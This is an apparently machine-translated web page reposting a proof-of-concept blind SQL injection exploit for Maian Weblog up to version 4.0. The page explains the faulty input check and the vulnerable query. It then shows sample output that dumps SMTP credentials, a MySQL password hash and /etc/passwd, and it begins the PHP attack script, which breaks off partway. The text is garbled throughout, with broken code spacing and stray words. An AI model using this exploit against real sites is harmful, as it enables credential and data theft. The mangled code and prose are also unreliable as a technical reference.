Maian weblog & amp; lt; = v4.0 SQL blind injection vulnerability and repair

Source: Internet
Author: User
Tags ereg

Maian weblog is a free blog system. If maian weblog is earlier than index. php In analyticdb 4.0, the SQL injection vulnerability may cause sensitive information leakage.

[+] Info:
~~~~~~~~~
Maian weblog <= v4.0 remote blind SQL injection exploit

[+] Poc:
~~~~~~~~~

View sourceprint? 001 <? Php

002 /*

003 maian weblog <= v4.0 Remote Blind SQL Injection Exploit

004 vendor: http://www.maianscriptworld.co.uk/

005 Thanks to Johannes Dahse: http://bit.ly/dpQXMK

006

007 Explanation:

008 Lines 335-341 of the index. php we see this if statement that concerns

009 our variable $ B _post.

010

011 // Check month and year vars...

012 // If they don't equal 0, are they numeric ?..

013 if ($ B _post = 0 &&! Ctype_digit ($ B _post ))

014 {

015 header ("Location: index. php ");

016 exit;

017}

018

019 This if statement is suppose to prevent the SQL Injection vulnerability.

020 However the logic implimented is incorrect, as there will never be a situation

021 where the $ B _post variable that we control will ever be a 0 and a string value.

022

023 So a simple fix to remediate this issue becomes clear, instead of an &,

024 author was suppose to use an |. o. O

025

026 Further down in the index. php page on lines 348-361, we see the location of

027 actual vulnerable code.

028

029 $ q_blog = mysql_query ("SELECT * FROM". $ database [prefix]. "blogs

030 WHERE id = $ B _post

031 LIMIT 1

032 ") or die (mysql_error ());

033 $ BLOG = mysql_fetch_object ($ q_blog );

034

035 // At this point, lets see if the last query fetched anything ..

036 // If it didn't, blog id is invalid. Might be someone bookmarked an old link ..

037 // If no data, redirect to homepage ..

038 if (mysql_num_rows ($ q_blog) = 0)

039 {

040 header ("Location: index. php ");

041 exit;

042}

043

044 The page redirects after the query is executed. This way you probably wont spot

045 bug in your browser from a blackbox view :). No urldecode () so we cant bypass

046 magic_quotes_gpc and the admin credentials are not stored in the database. doh.

047

048 Using <or> wocould make the PoC a little more efficient, but oh well: 0)

049 Assuming some stars are aligned, the PoC will make well over 11,000 requests...

050 [mr_me @ pluto maian_weblog] $ php PoC. php-t 192.168.56.101-d/maian_weblog/-p 127.0.0.1: 8080

051

052 -------------------------------------------------------

053 maian weblog <= v4.0 Remote Blind SQL Injection Explo! T

054 by mr_me-https://net-ninja.net/

055 -------------------------------------------------------

056

057 (+) Setting the proxy to Fig: 8080

058 (+) Getting basic database information

059 (+) Database version-> 5.1.41-3ubuntu12. 9

060 (+) Database name-> maian_weblog

061 (+) Database user-> root @ localhost

062 (+) SMTP details found!

063 (+) Getting SMTP host: user: pass-> localhost: maianmail: password

064 (+) Access to MySQL database successful, dumping hash!

065 (+) MySQL user: pass-> root: * EE4E2773D7530819563F0DC6FCE27446A51C9413

066 (!) Access to load_file (), wanna play? (Y/n): y

067

068 (+) Please enter the file (q to quit):/etc/shadow

069 (-) File doesnt exist/no access.

070 (+) Please enter the file (q to quit):/etc/passwd

071 (!) Dumping the/etc/passwd file, hold onto your knickers!

072 root: x: 0: 0: root:/bin/bash

073 daemon: x: 1: 1: daemon :......

074 */

075

076 print_r ("

077 -------------------------------------------------------

078 maian weblog <= v4.0 Remote Blind SQL Injection Explo! T

079 by mr_me-https://net-ninja.net/

080 -------------------------------------------------------

081 ");

082

083 if ($ argc <3 ){

084 print_r ("

085 -----------------------------------------------------------------------------

086 Usage: php ". $ argv [0]."-t

087 host: target server (ip/hostname)

088 path: directory path to wordpress

089 Options:

090-p [ip: port]: specify a proxy

091 Example:

092 php ". $ argv [0]."-t 192.168.1.5-d/webapps/wp/-p 127.0.0.1: 8080

093 php ". $ argv [0]."-t 192.168.1.5-d/webapps/wp/

094 -----------------------------------------------------------------------------

095 "); die ;}

096

097 error_reporting (7 );

098 ini_set ("max_execution_time", 0 );

099 ini_set ("default_socket_timeout", 5 );

100

101 $ proxy_regex = "(d {1, 3}. d {1, 3}. d {1, 3}. d {1, 3 })";

102

103 function setArgs ($ argv ){

104 $ _ ARG = array ();

105 foreach ($ argv as $ arg ){

106 if (ereg ("-- ([^ =] +) = (. *)", $ arg, $ reg )){

107 $ _ ARG [$ reg [1] = $ reg [2];

108} elseif (ereg ("^-([a-zA-Z0-9])", $ arg, $ reg )){

109 $ _ ARG [$ reg [1] = "true ";

110} else {

111 $ _ ARG ["input"] [] = $ arg;

112}

113

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.